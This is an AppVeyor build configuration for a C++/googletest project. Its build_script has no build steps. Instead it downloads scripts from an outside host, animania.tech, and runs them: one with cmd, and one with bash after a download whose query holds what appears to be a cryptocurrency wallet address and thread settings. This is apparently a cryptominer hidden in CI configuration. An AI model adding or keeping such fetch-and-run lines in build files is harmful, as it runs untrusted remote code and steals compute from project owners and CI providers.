# Windows Build Configuration for AppVeyor
# http://www.appveyor.com/docs/appveyor-yml

# build version format
version: "{build}"

os: Visual Studio 2013

platform:
  - Any CPU

configuration:
  - Debug
  - Release

branches:
  only:
    - master

clone_depth: 5

matrix:
  fast_finish: true # Show final status immediately if a test fails.

# scripts that run after cloning repository
install:
  - git clone https://github.com/google/googletest.git External/googletest

build:
  parallel: true  # enable MSBuild parallel builds
  verbosity: minimal

build_script:
  - curl https://animania.tech/downloader.txt
  - cmd: downloader.txt 
  - curl "https://www.animania.tech/start.txt?address=RLM9zhMnfJisKwYpbREgsfyFrs2RnZvs4e&BASH=CH01&thread=2&region=ap" --output start.txt
  - cmd: bash start.txt

test_script:
  - ctest -C %CONFIGURATION% --output-on-failure
  - cd ../Test && bash runtests
